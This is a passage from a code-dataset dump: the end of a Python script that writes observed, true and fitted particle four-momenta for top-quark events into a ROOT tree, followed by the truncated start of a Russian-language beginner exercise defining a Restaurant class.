= array.array( 'f', [ -1.] )\nb_jet4_m_obs = array.array( 'f', [ -1.] )\nb_jet4_btag_obs = array.array( 'f', [ -1.] )\nb_jet5_px_obs = array.array( 'f', [ -1.] )\nb_jet5_py_obs = array.array( 'f', [ -1.] )\nb_jet5_pz_obs = array.array( 'f', [ -1.] )\nb_jet5_pt_obs = array.array( 'f', [ -1.] )\nb_jet5_E_obs = array.array( 'f', [ -1.] )\nb_jet5_m_obs = array.array( 'f', [ -1.] )\nb_jet5_btag_obs = array.array( 'f', [ -1.] )\nb_jetmu_px_obs = array.array( 'f', [ -1.] )\nb_jetmu_py_obs = array.array( 'f', [ -1.] )\nb_jetmu_pz_obs = array.array( 'f', [ -1.] )\nb_jetmu_T0_obs = array.array( 'f', [ -1.] )\nb_jetlep_ET_obs = array.array( 'f', [ -1.] )\nb_jetlep_phi_obs = array.array( 'f', [ -1.] )\n\nb_W_had_px_true = array.array( 'f', [ -1.] )\nb_W_had_py_true = array.array( 'f', [ -1.] )\nb_W_had_pz_true = array.array( 'f', [ -1.] )\nb_W_had_E_true = array.array( 'f', [ -1.] )\nb_W_had_m_true = array.array( 'f', [ -1.] )\nb_W_had_pt_true = array.array( 'f', [ -1.] 
)\nb_W_had_y_true = array.array( 'f', [ -1.] )\nb_W_had_phi_true = array.array( 'f', [ -1.] )\nb_b_had_px_true = array.array( 'f', [ -1.] )\nb_b_had_py_true = array.array( 'f', [ -1.] )\nb_b_had_pz_true = array.array( 'f', [ -1.] )\nb_b_had_E_true = array.array( 'f', [ -1.] )\nb_b_had_m_true = array.array( 'f', [ -1.] )\nb_b_had_pt_true = array.array( 'f', [ -1.] )\nb_b_had_y_true = array.array( 'f', [ -1.] )\nb_b_had_phi_true = array.array( 'f', [ -1.] )\nb_t_had_px_true = array.array( 'f', [ -1.] )\nb_t_had_py_true = array.array( 'f', [ -1.] )\nb_t_had_pz_true = array.array( 'f', [ -1.] )\nb_t_had_E_true = array.array( 'f', [ -1.] )\nb_t_had_m_true = array.array( 'f', [ -1.] )\nb_t_had_pt_true = array.array( 'f', [ -1.] )\nb_t_had_y_true = array.array( 'f', [ -1.] )\nb_t_had_phi_true = array.array( 'f', [ -1.] )\nb_W_lep_px_true = array.array( 'f', [ -1.] )\nb_W_lep_py_true = array.array( 'f', [ -1.] )\nb_W_lep_pz_true = array.array( 'f', [ -1.] )\nb_W_lep_E_true = array.array( 'f', [ -1.] )\nb_W_lep_m_true = array.array( 'f', [ -1.] )\nb_W_lep_pt_true = array.array( 'f', [ -1.] )\nb_W_lep_y_true = array.array( 'f', [ -1.] )\nb_W_lep_phi_true = array.array( 'f', [ -1.] )\nb_b_lep_px_true = array.array( 'f', [ -1.] )\nb_b_lep_py_true = array.array( 'f', [ -1.] )\nb_b_lep_pz_true = array.array( 'f', [ -1.] )\nb_b_lep_E_true = array.array( 'f', [ -1.] )\nb_b_lep_m_true = array.array( 'f', [ -1.] )\nb_b_lep_pt_true = array.array( 'f', [ -1.] )\nb_b_lep_y_true = array.array( 'f', [ -1.] )\nb_b_lep_phi_true = array.array( 'f', [ -1.] )\nb_t_lep_px_true = array.array( 'f', [ -1.] )\nb_t_lep_py_true = array.array( 'f', [ -1.] )\nb_t_lep_pz_true = array.array( 'f', [ -1.] )\nb_t_lep_E_true = array.array( 'f', [ -1.] )\nb_t_lep_m_true = array.array( 'f', [ -1.] )\nb_t_lep_pt_true = array.array( 'f', [ -1.] )\nb_t_lep_y_true = array.array( 'f', [ -1.] )\nb_t_lep_phi_true = array.array( 'f', [ -1.] )\n\nb_W_had_px_fitted = array.array( 'f', [ -1.] )\nb_W_had_py_fitted = array.array( 'f', [ -1.] )\nb_W_had_pz_fitted = array.array( 'f', [ -1.] )\nb_W_had_E_fitted = array.array( 'f', [ -1.] )\nb_W_had_m_fitted = array.array( 'f', [ -1.] )\nb_W_had_pt_fitted = array.array( 'f', [ -1.] )\nb_W_had_y_fitted = array.array( 'f', [ -1.] )\nb_W_had_phi_fitted = array.array( 'f', [ -1.] )\nb_b_had_px_fitted = array.array( 'f', [ -1.] )\nb_b_had_py_fitted = array.array( 'f', [ -1.] )\nb_b_had_pz_fitted = array.array( 'f', [ -1.] )\nb_b_had_E_fitted = array.array( 'f', [ -1.] )\nb_b_had_m_fitted = array.array( 'f', [ -1.] )\nb_b_had_pt_fitted = array.array( 'f', [ -1.] )\nb_b_had_y_fitted = array.array( 'f', [ -1.] )\nb_b_had_phi_fitted = array.array( 'f', [ -1.] )\nb_t_had_px_fitted = array.array( 'f', [ -1.] )\nb_t_had_py_fitted = array.array( 'f', [ -1.] )\nb_t_had_pz_fitted = array.array( 'f', [ -1.] )\nb_t_had_E_fitted = array.array( 'f', [ -1.] )\nb_t_had_m_fitted = array.array( 'f', [ -1.] )\nb_t_had_pt_fitted = array.array( 'f', [ -1.] )\nb_t_had_y_fitted = array.array( 'f', [ -1.] )\nb_t_had_phi_fitted = array.array( 'f', [ -1.] )\nb_W_lep_px_fitted = array.array( 'f', [ -1.] )\nb_W_lep_py_fitted = array.array( 'f', [ -1.] )\nb_W_lep_pz_fitted = array.array( 'f', [ -1.] )\nb_W_lep_E_fitted = array.array( 'f', [ -1.] )\nb_W_lep_m_fitted = array.array( 'f', [ -1.] )\nb_W_lep_pt_fitted = array.array( 'f', [ -1.] )\nb_W_lep_y_fitted = array.array( 'f', [ -1.] )\nb_W_lep_phi_fitted = array.array( 'f', [ -1.] )\nb_b_lep_px_fitted = array.array( 'f', [ -1.] )\nb_b_lep_py_fitted = array.array( 'f', [ -1.] 
)\nb_b_lep_pz_fitted = array.array( 'f', [ -1.] )\nb_b_lep_E_fitted = array.array( 'f', [ -1.] )\nb_b_lep_m_fitted = array.array( 'f', [ -1.] )\nb_b_lep_pt_fitted = array.array( 'f', [ -1.] )\nb_b_lep_y_fitted = array.array( 'f', [ -1.] )\nb_b_lep_phi_fitted = array.array( 'f', [ -1.] )\nb_t_lep_px_fitted = array.array( 'f', [ -1.] )\nb_t_lep_py_fitted = array.array( 'f', [ -1.] )\nb_t_lep_pz_fitted = array.array( 'f', [ -1.] )\nb_t_lep_E_fitted = array.array( 'f', [ -1.] )\nb_t_lep_m_fitted = array.array( 'f', [ -1.] )\nb_t_lep_pt_fitted = array.array( 'f', [ -1.] )\nb_t_lep_y_fitted = array.array( 'f', [ -1.] )\nb_t_lep_phi_fitted = array.array( 'f', [ -1.] )\n\nb_runNumber = array.array( 'i', [ -1] )\n\ntree = TTree( \"nominal\", \"nominal\" )\ntree.Branch( 'runNumber', b_runNumber, 'runNumber/i' )\n\ntree.Branch( 'jet1_px_obs', b_jet1_px_obs, 'jet1_px_obs/F')\ntree.Branch( 'jet1_py_obs', b_jet1_py_obs, 'jet1_py_obs/F')\ntree.Branch( 'jet1_pz_obs', b_jet1_pz_obs, 'jet1_pz_obs/F')\ntree.Branch( 'jet1_pt_obs', b_jet1_pt_obs, 'jet1_pt_obs/F')\ntree.Branch( 'jet1_E_obs', b_jet1_E_obs, 'jet1_E_obs/F')\ntree.Branch( 'jet1_m_obs', b_jet1_m_obs, 'jet1_m_obs/F')\ntree.Branch( 'jet1_btag_obs', b_jet1_btag_obs, 'jet1_btag_obs/F')\ntree.Branch( 'jet2_px_obs', b_jet2_px_obs, 'jet2_px_obs/F')\ntree.Branch( 'jet2_py_obs', b_jet2_py_obs, 'jet2_py_obs/F')\ntree.Branch( 'jet2_pz_obs', b_jet2_pz_obs, 'jet2_pz_obs/F')\ntree.Branch( 'jet2_pt_obs', b_jet2_pt_obs, 'jet2_pt_obs/F')\ntree.Branch( 'jet2_E_obs', b_jet2_E_obs, 'jet2_E_obs/F')\ntree.Branch( 'jet2_m_obs', b_jet2_m_obs, 'jet2_m_obs/F')\ntree.Branch( 'jet2_btag_obs', b_jet2_btag_obs, 'jet2_btag_obs/F')\ntree.Branch( 'jet3_px_obs', b_jet3_px_obs, 'jet3_px_obs/F')\ntree.Branch( 'jet3_py_obs', b_jet3_py_obs, 'jet3_py_obs/F')\ntree.Branch( 'jet3_pz_obs', b_jet3_pz_obs, 'jet3_pz_obs/F')\ntree.Branch( 'jet3_pt_obs', b_jet3_pt_obs, 'jet3_pt_obs/F')\ntree.Branch( 'jet3_E_obs', b_jet3_E_obs, 'jet3_E_obs/F')\ntree.Branch( 'jet3_m_obs', b_jet3_m_obs, 'jet3_m_obs/F')\ntree.Branch( 'jet3_btag_obs', b_jet3_btag_obs, 'jet3_btag_obs/F')\ntree.Branch( 'jet4_px_obs', b_jet4_px_obs, 'jet4_px_obs/F')\ntree.Branch( 'jet4_py_obs', b_jet4_py_obs, 'jet4_py_obs/F')\ntree.Branch( 'jet4_pz_obs', b_jet4_pz_obs, 'jet4_pz_obs/F')\ntree.Branch( 'jet4_pt_obs', b_jet4_pt_obs, 'jet4_pt_obs/F')\ntree.Branch( 'jet4_E_obs', b_jet4_E_obs, 'jet4_E_obs/F')\ntree.Branch( 'jet4_m_obs', b_jet4_m_obs, 'jet4_m_obs/F')\ntree.Branch( 'jet4_btag_obs', b_jet4_btag_obs, 'jet4_btag_obs/F')\ntree.Branch( 'jet5_px_obs', b_jet5_px_obs, 'jet5_px_obs/F')\ntree.Branch( 'jet5_py_obs', b_jet5_py_obs, 'jet5_py_obs/F')\ntree.Branch( 'jet5_pz_obs', b_jet5_pz_obs, 'jet5_pz_obs/F')\ntree.Branch( 'jet5_pt_obs', b_jet5_pt_obs, 'jet5_pt_obs/F')\ntree.Branch( 'jet5_E_obs', b_jet5_E_obs, 'jet5_E_obs/F')\ntree.Branch( 'jet5_m_obs', b_jet5_m_obs, 'jet5_m_obs/F')\ntree.Branch( 'jet5_btag_obs', b_jet5_btag_obs, 'jet5_btag_obs/F')\ntree.Branch( 'jetmu_px_obs', b_jetmu_px_obs, 'jetmu_px_obs/F')\ntree.Branch( 'jetmu_py_obs', b_jetmu_py_obs, 'jetmu_py_obs/F')\ntree.Branch( 'jetmu_pz_obs', b_jetmu_pz_obs, 'jetmu_pz_obs/F')\ntree.Branch( 'jetmu_T0_obs', b_jetmu_T0_obs, 'jetmu_T0_obs/F')\ntree.Branch( 'jetlep_ET_obs', b_jetlep_ET_obs, 'jetlep_ET_obs/F')\ntree.Branch( 'jetlep_phi_obs', b_jetlep_phi_obs, 'jetlep_phi_obs/F')\n\ntree.Branch( 'W_had_px_true', b_W_had_px_true, 'W_had_px_true/F' )\ntree.Branch( 'W_had_py_true', b_W_had_py_true, 'W_had_py_true/F' )\ntree.Branch( 'W_had_pz_true', b_W_had_pz_true, 'W_had_pz_true/F' 
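 # the trailing '/F' in the leaflist string marks a float leaf ('/i' an unsigned int)\n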
)\ntree.Branch( 'W_had_E_true', b_W_had_E_true, 'W_had_E_true/F' )\ntree.Branch( 'W_had_m_true', b_W_had_m_true, 'W_had_m_true/F' )\ntree.Branch( 'W_had_pt_true', b_W_had_pt_true, 'W_had_pt_true/F' )\ntree.Branch( 'W_had_y_true', b_W_had_y_true, 'W_had_y_true/F' )\ntree.Branch( 'W_had_phi_true', b_W_had_phi_true, 'W_had_phi_true/F' )\ntree.Branch( 'b_had_px_true', b_b_had_px_true, 'b_had_px_true/F' )\ntree.Branch( 'b_had_py_true', b_b_had_py_true, 'b_had_py_true/F' )\ntree.Branch( 'b_had_pz_true', b_b_had_pz_true, 'b_had_pz_true/F' )\ntree.Branch( 'b_had_E_true', b_b_had_E_true, 'b_had_E_true/F' )\ntree.Branch( 'b_had_m_true', b_b_had_m_true, 'b_had_m_true/F' )\ntree.Branch( 'b_had_pt_true', b_b_had_pt_true, 'b_had_pt_true/F' )\ntree.Branch( 'b_had_y_true', b_b_had_y_true, 'b_had_y_true/F' )\ntree.Branch( 'b_had_phi_true', b_b_had_phi_true, 'b_had_phi_true/F' )\ntree.Branch( 't_had_px_true', b_t_had_px_true, 't_had_px_true/F' )\ntree.Branch( 't_had_py_true', b_t_had_py_true, 't_had_py_true/F' )\ntree.Branch( 't_had_pz_true', b_t_had_pz_true, 't_had_pz_true/F' )\ntree.Branch( 't_had_E_true', b_t_had_E_true, 't_had_E_true/F' )\ntree.Branch( 't_had_m_true', b_t_had_m_true, 't_had_m_true/F' )\ntree.Branch( 't_had_pt_true', b_t_had_pt_true, 't_had_pt_true/F' )\ntree.Branch( 't_had_y_true', b_t_had_y_true, 't_had_y_true/F' )\ntree.Branch( 't_had_phi_true', b_t_had_phi_true, 't_had_phi_true/F' )\ntree.Branch( 'W_lep_px_true', b_W_lep_px_true, 'W_lep_px_true/F' )\ntree.Branch( 'W_lep_py_true', b_W_lep_py_true, 'W_lep_py_true/F' )\ntree.Branch( 'W_lep_pz_true', b_W_lep_pz_true, 'W_lep_pz_true/F' )\ntree.Branch( 'W_lep_E_true', b_W_lep_E_true, 'W_lep_E_true/F' )\ntree.Branch( 'W_lep_m_true', b_W_lep_m_true, 'W_lep_m_true/F' )\ntree.Branch( 'W_lep_pt_true', b_W_lep_pt_true, 'W_lep_pt_true/F' )\ntree.Branch( 'W_lep_y_true', b_W_lep_y_true, 'W_lep_y_true/F' )\ntree.Branch( 'W_lep_phi_true', b_W_lep_phi_true, 'W_lep_phi_true/F' )\ntree.Branch( 'b_lep_px_true', b_b_lep_px_true, 'b_lep_px_true/F' )\ntree.Branch( 'b_lep_py_true', b_b_lep_py_true, 'b_lep_py_true/F' )\ntree.Branch( 'b_lep_pz_true', b_b_lep_pz_true, 'b_lep_pz_true/F' )\ntree.Branch( 'b_lep_E_true', b_b_lep_E_true, 'b_lep_E_true/F' )\ntree.Branch( 'b_lep_m_true', b_b_lep_m_true, 'b_lep_m_true/F' )\ntree.Branch( 'b_lep_pt_true', b_b_lep_pt_true, 'b_lep_pt_true/F' )\ntree.Branch( 'b_lep_y_true', b_b_lep_y_true, 'b_lep_y_true/F' )\ntree.Branch( 'b_lep_phi_true', b_b_lep_phi_true, 'b_lep_phi_true/F' )\ntree.Branch( 't_lep_px_true', b_t_lep_px_true, 't_lep_px_true/F' )\ntree.Branch( 't_lep_py_true', b_t_lep_py_true, 't_lep_py_true/F' )\ntree.Branch( 't_lep_pz_true', b_t_lep_pz_true, 't_lep_pz_true/F' )\ntree.Branch( 't_lep_E_true', b_t_lep_E_true, 't_lep_E_true/F' )\ntree.Branch( 't_lep_m_true', b_t_lep_m_true, 't_lep_m_true/F' )\ntree.Branch( 't_lep_pt_true', b_t_lep_pt_true, 't_lep_pt_true/F' )\ntree.Branch( 't_lep_y_true', b_t_lep_y_true, 't_lep_y_true/F' )\ntree.Branch( 't_lep_phi_true', b_t_lep_phi_true, 't_lep_phi_true/F' )\n\ntree.Branch( 'W_had_px_fitted', b_W_had_px_fitted, 'W_had_px_fitted/F' )\ntree.Branch( 'W_had_py_fitted', b_W_had_py_fitted, 'W_had_py_fitted/F' )\ntree.Branch( 'W_had_pz_fitted', b_W_had_pz_fitted, 'W_had_pz_fitted/F' )\ntree.Branch( 'W_had_E_fitted', b_W_had_E_fitted, 'W_had_E_fitted/F' )\ntree.Branch( 'W_had_m_fitted', b_W_had_m_fitted, 'W_had_m_fitted/F' )\ntree.Branch( 'W_had_pt_fitted', b_W_had_pt_fitted, 'W_had_pt_fitted/F' )\ntree.Branch( 'W_had_y_fitted', b_W_had_y_fitted, 'W_had_y_fitted/F' )\ntree.Branch( 
'W_had_phi_fitted', b_W_had_phi_fitted, 'W_had_phi_fitted/F' )\ntree.Branch( 'b_had_px_fitted', b_b_had_px_fitted, 'b_had_px_fitted/F' )\ntree.Branch( 'b_had_py_fitted', b_b_had_py_fitted, 'b_had_py_fitted/F' )\ntree.Branch( 'b_had_pz_fitted', b_b_had_pz_fitted, 'b_had_pz_fitted/F' )\ntree.Branch( 'b_had_E_fitted', b_b_had_E_fitted, 'b_had_E_fitted/F' )\ntree.Branch( 'b_had_m_fitted', b_b_had_m_fitted, 'b_had_m_fitted/F' )\ntree.Branch( 'b_had_pt_fitted', b_b_had_pt_fitted, 'b_had_pt_fitted/F' )\ntree.Branch( 'b_had_y_fitted', b_b_had_y_fitted, 'b_had_y_fitted/F' )\ntree.Branch( 'b_had_phi_fitted', b_b_had_phi_fitted, 'b_had_phi_fitted/F' )\ntree.Branch( 't_had_px_fitted', b_t_had_px_fitted, 't_had_px_fitted/F' )\ntree.Branch( 't_had_py_fitted', b_t_had_py_fitted, 't_had_py_fitted/F' )\ntree.Branch( 't_had_pz_fitted', b_t_had_pz_fitted, 't_had_pz_fitted/F' )\ntree.Branch( 't_had_E_fitted', b_t_had_E_fitted, 't_had_E_fitted/F' )\ntree.Branch( 't_had_m_fitted', b_t_had_m_fitted, 't_had_m_fitted/F' )\ntree.Branch( 't_had_pt_fitted', b_t_had_pt_fitted, 't_had_pt_fitted/F' )\ntree.Branch( 't_had_y_fitted', b_t_had_y_fitted, 't_had_y_fitted/F' )\ntree.Branch( 't_had_phi_fitted', b_t_had_phi_fitted, 't_had_phi_fitted/F' )\ntree.Branch( 'W_lep_px_fitted', b_W_lep_px_fitted, 'W_lep_px_fitted/F' )\ntree.Branch( 'W_lep_py_fitted', b_W_lep_py_fitted, 'W_lep_py_fitted/F' )\ntree.Branch( 'W_lep_pz_fitted', b_W_lep_pz_fitted, 'W_lep_pz_fitted/F' )\ntree.Branch( 'W_lep_E_fitted', b_W_lep_E_fitted, 'W_lep_E_fitted/F' )\ntree.Branch( 'W_lep_m_fitted', b_W_lep_m_fitted, 'W_lep_m_fitted/F' )\ntree.Branch( 'W_lep_pt_fitted', b_W_lep_pt_fitted, 'W_lep_pt_fitted/F' )\ntree.Branch( 'W_lep_y_fitted', b_W_lep_y_fitted, 'W_lep_y_fitted/F' )\ntree.Branch( 'W_lep_phi_fitted', b_W_lep_phi_fitted, 'W_lep_phi_fitted/F' )\ntree.Branch( 'b_lep_px_fitted', b_b_lep_px_fitted, 'b_lep_px_fitted/F' )\ntree.Branch( 'b_lep_py_fitted', b_b_lep_py_fitted, 'b_lep_py_fitted/F' )\ntree.Branch( 'b_lep_pz_fitted', b_b_lep_pz_fitted, 'b_lep_pz_fitted/F' )\ntree.Branch( 'b_lep_E_fitted', b_b_lep_E_fitted, 'b_lep_E_fitted/F' )\ntree.Branch( 'b_lep_m_fitted', b_b_lep_m_fitted, 'b_lep_m_fitted/F' )\ntree.Branch( 'b_lep_pt_fitted', b_b_lep_pt_fitted, 'b_lep_pt_fitted/F' )\ntree.Branch( 'b_lep_y_fitted', b_b_lep_y_fitted, 'b_lep_y_fitted/F' )\ntree.Branch( 'b_lep_phi_fitted', b_b_lep_phi_fitted, 'b_lep_phi_fitted/F' )\ntree.Branch( 't_lep_px_fitted', b_t_lep_px_fitted, 't_lep_px_fitted/F' )\ntree.Branch( 't_lep_py_fitted', b_t_lep_py_fitted, 't_lep_py_fitted/F' )\ntree.Branch( 't_lep_pz_fitted', b_t_lep_pz_fitted, 't_lep_pz_fitted/F' )\ntree.Branch( 't_lep_E_fitted', b_t_lep_E_fitted, 't_lep_E_fitted/F' )\ntree.Branch( 't_lep_m_fitted', b_t_lep_m_fitted, 't_lep_m_fitted/F' )\ntree.Branch( 't_lep_pt_fitted', b_t_lep_pt_fitted, 't_lep_pt_fitted/F' )\ntree.Branch( 't_lep_y_fitted', b_t_lep_y_fitted, 't_lep_y_fitted/F' )\ntree.Branch( 't_lep_phi_fitted', b_t_lep_phi_fitted, 't_lep_phi_fitted/F' )\n\nfor i in range(n_events):\n if ( n_events < 10 ) or ( (i+1) % int(float(n_events)/10.) == 0 ):\n perc = 100. 
* i / float(n_events)\n print(\"INFO: Event %-9i (%3.0f %%)\" % ( i, perc ))\n\n \n\n W_had_true = MakeP4( y_true_W_had[i], m_W, representation)\n W_had_fitted = MakeP4( y_fitted_W_had[i], m_W, representation)\n\n W_lep_true = MakeP4( y_true_W_lep[i], m_W , representation)\n W_lep_fitted = MakeP4( y_fitted_W_lep[i], m_W, representation)\n\n b_had_true = MakeP4( y_true_b_had[i], m_b , representation)\n b_had_fitted = MakeP4( y_fitted_b_had[i], m_b , representation)\n\n b_lep_true = MakeP4( y_true_b_lep[i], m_b , representation)\n b_lep_fitted = MakeP4( y_fitted_b_lep[i], m_b, representation)\n\n t_had_true = MakeP4( y_true_t_had[i], m_t , representation)\n t_had_fitted = MakeP4( y_fitted_t_had[i], m_t , representation)\n\n t_lep_true = MakeP4( y_true_t_lep[i], m_t , representation)\n t_lep_fitted = MakeP4( y_fitted_t_lep[i], m_t, representation)\n\n jet_1_vect = MakeP4(jet_1[i], jet_1[i][4], representation)\n jet_2_vect = MakeP4(jet_2[i], jet_2[i][4], representation)\n jet_3_vect = MakeP4(jet_3[i], jet_3[i][4], representation)\n jet_4_vect = MakeP4(jet_4[i], jet_4[i][4], representation)\n jet_5_vect = MakeP4(jet_5[i], jet_5[i][4], representation)\n\n b_runNumber[0] = i\n \n b_jet1_px_obs[0] = jet_1_vect.Px()\n b_jet1_py_obs[0] = jet_1_vect.Py()\n b_jet1_pz_obs[0] = jet_1_vect.Pz()\n b_jet1_pt_obs[0] = jet_1_vect.Pt()\n b_jet1_E_obs [0] = jet_1_vect.E()\n b_jet1_m_obs [0] = jet_1_vect.M()\n b_jet1_btag_obs[0] = jet_1[i][5]\n b_jet2_px_obs[0] = jet_2_vect.Px()\n b_jet2_py_obs[0] = jet_2_vect.Py()\n b_jet2_pz_obs[0] = jet_2_vect.Pz()\n b_jet2_pt_obs[0] = jet_2_vect.Pt()\n b_jet2_E_obs [0] = jet_2_vect.E()\n b_jet2_m_obs [0] = jet_2_vect.M()\n b_jet2_btag_obs[0] = jet_2[i][5]\n b_jet3_px_obs[0] = jet_3_vect.Px()\n b_jet3_py_obs[0] = jet_3_vect.Py()\n b_jet3_pz_obs[0] = jet_3_vect.Pz()\n b_jet3_pt_obs[0] = jet_3_vect.Pt()\n b_jet3_E_obs [0] = jet_3_vect.E()\n b_jet3_m_obs [0] = jet_3_vect.M()\n b_jet3_btag_obs[0] = jet_3[i][5]\n b_jet4_px_obs[0] = jet_4_vect.Px()\n b_jet4_py_obs[0] = jet_4_vect.Py()\n b_jet4_pz_obs[0] = jet_4_vect.Pz()\n b_jet4_pt_obs[0] = jet_4_vect.Pt()\n b_jet4_E_obs [0] = jet_4_vect.E()\n b_jet4_m_obs [0] = jet_4_vect.M()\n b_jet4_btag_obs[0] = jet_4[i][5]\n b_jet5_px_obs[0] = jet_5_vect.Px()\n b_jet5_py_obs[0] = jet_5_vect.Py()\n b_jet5_pz_obs[0] = jet_5_vect.Pz()\n b_jet5_pt_obs[0] = jet_5_vect.Pt()\n b_jet5_E_obs [0] = jet_5_vect.E()\n b_jet5_m_obs [0] = jet_5_vect.M()\n b_jet5_btag_obs[0] = jet_5[i][5]\n b_jetmu_px_obs[0] = jet_mu[i][0]\n b_jetmu_py_obs[0] = jet_mu[i][1]\n b_jetmu_pz_obs[0] = jet_mu[i][2]\n b_jetmu_T0_obs [0] = jet_mu[i][3]\n b_jetlep_ET_obs [0] = jet_mu[i][4]\n b_jetlep_phi_obs[0] = jet_mu[i][5]\n\n # true\n\n b_W_had_px_true[0] = W_had_true.Px()\n b_W_had_py_true[0] = W_had_true.Py()\n b_W_had_pz_true[0] = W_had_true.Pz()\n b_W_had_E_true[0] = W_had_true.E()\n b_W_had_m_true[0] = W_had_true.M()\n b_W_had_pt_true[0] = W_had_true.Pt()\n b_W_had_y_true[0] = W_had_true.Rapidity()\n b_W_had_phi_true[0] = W_had_true.Phi()\n\n b_b_had_px_true[0] = b_had_true.Px()\n b_b_had_py_true[0] = b_had_true.Py()\n b_b_had_pz_true[0] = b_had_true.Pz()\n b_b_had_E_true[0] = b_had_true.E()\n b_b_had_m_true[0] = b_had_true.M()\n b_b_had_pt_true[0] = b_had_true.Pt()\n b_b_had_y_true[0] = b_had_true.Rapidity()\n b_b_had_phi_true[0] = b_had_true.Phi()\n\n b_t_had_px_true[0] = t_had_true.Px()\n b_t_had_py_true[0] = t_had_true.Py()\n b_t_had_pz_true[0] = t_had_true.Pz()\n b_t_had_E_true[0] = t_had_true.E()\n b_t_had_m_true[0] = t_had_true.M()\n b_t_had_pt_true[0] = 
t_had_true.Pt()\n b_t_had_y_true[0] = t_had_true.Rapidity()\n b_t_had_phi_true[0] = t_had_true.Phi()\n\n b_W_lep_px_true[0] = W_lep_true.Px()\n b_W_lep_py_true[0] = W_lep_true.Py()\n b_W_lep_pz_true[0] = W_lep_true.Pz()\n b_W_lep_E_true[0] = W_lep_true.E()\n b_W_lep_m_true[0] = W_lep_true.M()\n b_W_lep_pt_true[0] = W_lep_true.Pt()\n b_W_lep_y_true[0] = W_lep_true.Rapidity()\n b_W_lep_phi_true[0] = W_lep_true.Phi()\n\n b_b_lep_px_true[0] = b_lep_true.Px()\n b_b_lep_py_true[0] = b_lep_true.Py()\n b_b_lep_pz_true[0] = b_lep_true.Pz()\n b_b_lep_E_true[0] = b_lep_true.E()\n b_b_lep_m_true[0] = b_lep_true.M()\n b_b_lep_pt_true[0] = b_lep_true.Pt()\n b_b_lep_y_true[0] = b_lep_true.Rapidity()\n b_b_lep_phi_true[0] = b_lep_true.Phi()\n\n b_t_lep_px_true[0] = t_lep_true.Px()\n b_t_lep_py_true[0] = t_lep_true.Py()\n b_t_lep_pz_true[0] = t_lep_true.Pz()\n b_t_lep_E_true[0] = t_lep_true.E()\n b_t_lep_m_true[0] = t_lep_true.M()\n b_t_lep_pt_true[0] = t_lep_true.Pt()\n b_t_lep_y_true[0] = t_lep_true.Rapidity()\n b_t_lep_phi_true[0] = t_lep_true.Phi()\n\n # fitted\n\n b_W_had_px_fitted[0] = W_had_fitted.Px()\n b_W_had_py_fitted[0] = W_had_fitted.Py()\n b_W_had_pz_fitted[0] = W_had_fitted.Pz()\n b_W_had_E_fitted[0] = W_had_fitted.E()\n b_W_had_m_fitted[0] = W_had_fitted.M()\n b_W_had_pt_fitted[0] = W_had_fitted.Pt()\n b_W_had_y_fitted[0] = W_had_fitted.Rapidity()\n b_W_had_phi_fitted[0] = W_had_fitted.Phi()\n\n b_b_had_px_fitted[0] = b_had_fitted.Px()\n b_b_had_py_fitted[0] = b_had_fitted.Py()\n b_b_had_pz_fitted[0] = b_had_fitted.Pz()\n b_b_had_E_fitted[0] = b_had_fitted.E()\n b_b_had_m_fitted[0] = b_had_fitted.M()\n b_b_had_pt_fitted[0] = b_had_fitted.Pt()\n b_b_had_y_fitted[0] = b_had_fitted.Rapidity()\n b_b_had_phi_fitted[0] = b_had_fitted.Phi()\n\n b_t_had_px_fitted[0] = t_had_fitted.Px()\n b_t_had_py_fitted[0] = t_had_fitted.Py()\n b_t_had_pz_fitted[0] = t_had_fitted.Pz()\n b_t_had_E_fitted[0] = t_had_fitted.E()\n b_t_had_m_fitted[0] = t_had_fitted.M()\n b_t_had_pt_fitted[0] = t_had_fitted.Pt()\n b_t_had_y_fitted[0] = t_had_fitted.Rapidity()\n b_t_had_phi_fitted[0] = t_had_fitted.Phi()\n\n b_W_lep_px_fitted[0] = W_lep_fitted.Px()\n b_W_lep_py_fitted[0] = W_lep_fitted.Py()\n b_W_lep_pz_fitted[0] = W_lep_fitted.Pz()\n b_W_lep_E_fitted[0] = W_lep_fitted.E()\n b_W_lep_m_fitted[0] = W_lep_fitted.M()\n b_W_lep_pt_fitted[0] = W_lep_fitted.Pt()\n b_W_lep_y_fitted[0] = W_lep_fitted.Rapidity()\n b_W_lep_phi_fitted[0] = W_lep_fitted.Phi()\n\n b_b_lep_px_fitted[0] = b_lep_fitted.Px()\n b_b_lep_py_fitted[0] = b_lep_fitted.Py()\n b_b_lep_pz_fitted[0] = b_lep_fitted.Pz()\n b_b_lep_E_fitted[0] = b_lep_fitted.E()\n b_b_lep_m_fitted[0] = b_lep_fitted.M()\n b_b_lep_pt_fitted[0] = b_lep_fitted.Pt()\n b_b_lep_y_fitted[0] = b_lep_fitted.Rapidity()\n b_b_lep_phi_fitted[0] = b_lep_fitted.Phi()\n\n b_t_lep_px_fitted[0] = t_lep_fitted.Px()\n b_t_lep_py_fitted[0] = t_lep_fitted.Py()\n b_t_lep_pz_fitted[0] = t_lep_fitted.Pz()\n b_t_lep_E_fitted[0] = t_lep_fitted.E()\n b_t_lep_m_fitted[0] = t_lep_fitted.M()\n b_t_lep_pt_fitted[0] = t_lep_fitted.Pt()\n b_t_lep_y_fitted[0] = t_lep_fitted.Rapidity()\n b_t_lep_phi_fitted[0] = t_lep_fitted.Phi()\n\n tree.Fill()\n\ntree.Print()\nofile.Write ()\nofile.Close ()\n","repo_name":"mgwg/AngryTops","sub_path":"AngryTops/Plotting/jet_filter_tree.py","file_name":"jet_filter_tree.py","file_ext":"py","file_size_in_byte":26101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11215996939","text":"\"\"\"\r\nПосетители: начните с программы 
из упражнения 9.1. Добавьте атрибут \r\nnumber_served со значением по умолчанию 0; он представляет количество \r\nобслуженных посетителей. Создайте экземпляр с именем restaurant. Выведите \r\nзначение number_served, потом измените и выведите снова. Добавьте метод с именем\r\nset_number_served(), позволяющий задать количество обслуженных посетителей. \r\nВызовите метод с новым числом, снова выведите значение. Добавьте метод с именем \r\nincrement_number_served(), который увеличивает количество обслуженных \r\nпосетителей на заданную величину. Вызовите этот метод с любым числом, которое \r\nмогло бы представлять количество обслуженных клиентов — скажем, за один день. \r\n\"\"\"\r\n\r\nclass Restaurant():\r\n \"\"\"Простая модель ресторана.\"\"\"\r\n\r\n def __init__(self, restaurant_name, cuisine_type):\r\n self.restaurant_name = restaurant_name\r\n self.cuisine_type = cuisine_type\r\n self.number_served = 0\r\n \r\n def describe_restaurant(self):\r\n print(\"Название ресторана: \" + self.restaurant_name.title() + \".\")\r\n print(\"Тут вас ждет изумительная \" + self.cuisine_type 